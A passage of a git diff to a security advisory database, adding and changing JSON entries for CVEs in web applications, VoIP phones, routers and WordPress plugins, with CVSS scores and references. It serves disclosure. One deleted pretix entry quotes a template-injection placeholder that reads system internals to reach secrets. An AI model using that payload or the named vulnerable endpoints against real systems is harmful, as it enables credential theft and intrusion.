"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25350" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47679" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xmedia-recode-mu-denial-of-service" + }, + { + "type": "WEB", + "url": "https://www.xmedia-recode.de" + }, + { + "type": "WEB", + "url": "https://www.xmedia-recode.de/download.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json index 0b17534a5d311..be83da381f450 100644 --- a/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json +++ b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json b/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json index e37162683213a..925d1ddd04030 100644 --- a/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json +++ b/advisories/unreviewed/2026/02/GHSA-r3f7-9rj4-j5fm/GHSA-r3f7-9rj4-j5fm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r3f7-9rj4-j5fm", - "modified": "2026-02-16T12:30:24Z", + "modified": "2026-02-19T18:31:43Z", "published": "2026-02-14T18:30:15Z", "aliases": [ "CVE-2026-23169" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/1f1b9523527df02685dde603f20ff6e603d8e4a1" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/338d40bab283da2639780ee3e458fb61f1567d8c" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/455e882192c9833f176f3fbbbb2f036b6c5bf555" @@ -26,6 +30,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/51223bdd0f60b06cfc7f25885c4d4be917adba94" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7896dbe990d56d5bb8097863b2645355633665eb" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/e2a9eeb69f7d4ca4cf4c70463af77664fdb6ab1d" diff --git a/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json b/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json new file mode 100644 index 0000000000000..e2b8729212985 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r435-hw3q-c6g9/GHSA-r435-hw3q-c6g9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r435-hw3q-c6g9", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2731" + ], + "details": "Path traversal and content injection in JobRunnerBackground.aspx in DynamicWeb 8 (all) and 9 (<9.19.7 and <9.20.3) allows unauthenticated attackers to execute code via simple web requests", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2731" + }, + { + "type": "WEB", + "url": "https://doc.dynamicweb.dev/documentation/fundamentals/dw10release/security-reports.html#january-19th-2026---unauthenticated-rce-dynamicweb-9-and-dynamicweb-8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json new file mode 100644 index 0000000000000..0ab746b310ee2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m3-cm43-fxrj", + "modified": "2026-02-20T21:31:20Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2329" + ], + "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2329" + }, + { + "type": "WEB", + "url": "https://github.com/rapid7/metasploit-framework/pull/20983" + }, + { + "type": "WEB", + "url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf" + }, + { + "type": "WEB", + "url": "https://psirt.grandstream.com" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json new file mode 100644 index 0000000000000..c293e49d3b5a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m5-gc42-8vvh", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-8055" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8055" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json new file mode 100644 index 0000000000000..ee09b0f2fd791 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5c8-59gv-v4x8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69306" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Electio Core electio-core allows Blind SQL Injection.This issue affects Electio Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/electio-core/vulnerability/wordpress-electio-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json b/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json new file mode 100644 index 0000000000000..97a6560697ced --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r5hv-pjcp-ccv3/GHSA-r5hv-pjcp-ccv3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5hv-pjcp-ccv3", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14445" + ], + "details": "The Image Hotspot by DevVN plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'hotspot_content' custom field meta in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14445" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/devvn-image-hotspot/tags/1.2.9/admin/inc/add_shortcode_devvn_ihotspot.php?marks=97#L97" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417725%40devvn-image-hotspot&new=3417725%40devvn-image-hotspot&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e41965eb-f8eb-4f40-b8f6-e415dff048cd?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json new file mode 100644 index 0000000000000..c9305e8865a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r62q-p7vv-vh53", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2853" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. This affects the function sub_462E14 of the file /boafrm/formSysLog of the component System Log Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2853" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347092" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347092" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754456" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json new file mode 100644 index 0000000000000..bd2e0e158666f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r77x-pqm4-6252", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60037" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60037" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json index a6a60f3a00191..6d981a8685767 100644 --- a/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json +++ b/advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r7jp-3wp4-fvf4", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-17T15:31:34Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20629" ], "details": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.3. An app may be able to access user-sensitive data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-922" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json new file mode 100644 index 0000000000000..8845ecb3b866e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7pc-wm4g-53rv", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27056" + ], + "details": "Missing Authorization vulnerability in StellarWP iThemes Sync ithemes-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iThemes Sync: from n/a through <= 3.2.8.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27056" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ithemes-sync/vulnerability/wordpress-ithemes-sync-plugin-3-2-8-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json new file mode 100644 index 0000000000000..72fb404453dbc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r872-6r9v-fwgg", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25441" + ], + "details": "thesystem 1.0 contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by submitting malicious input to the run_command endpoint. Attackers can send POST requests with shell commands in the command parameter to execute arbitrary code on the server without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25441" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47441" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-command-injection-via-runcommand-endpoint" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json new file mode 100644 index 0000000000000..bbe7a802209ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8fr-76pj-5h7j", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69324" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Stored XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69324" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nex-forms-express-wp-form-builder/vulnerability/wordpress-nex-forms-plugin-9-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json deleted file mode 100644 index dafc5f9866b7e..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r8p8-qw9w-j9qv", - "modified": "2026-02-16T12:30:25Z", - "published": "2026-02-16T12:30:25Z", - "aliases": [ - "CVE-2026-2415" - ], - "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will be replaced with the buyer's \nname for the final email. This mechanism contained two security-relevant\n bugs:\n\n\n\n * \nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\n\n\n\n\n * \nPlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is {invoice_company}, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. However, we also consider this scenario \nvery unlikely under typical conditions.\n\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:L/U:Red" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" - }, - { - "type": "WEB", - "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-627" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-16T11:15:56Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json new file mode 100644 index 0000000000000..d27a55f54169b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rc45-jprg-5pmq", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2038" + ], + "details": "GFI Archiver MArc.Core Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Core.Remoting.exe process, which listens on port 8017. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-27934.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2038" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json new file mode 100644 index 0000000000000..853829fb4e468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcjr-qg8v-4c3v", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0875" + ], + "details": "A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0875" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json b/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json new file mode 100644 index 0000000000000..c10149e9b8b8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rf92-7gjw-vm2g/GHSA-rf92-7gjw-vm2g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf92-7gjw-vm2g", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25429" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the openvpn_advanced endpoint. Attackers can inject JavaScript code through the GLOBAL_NETWORKS and GLOBAL_DNS parameters via POST requests to execute arbitrary scripts in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": 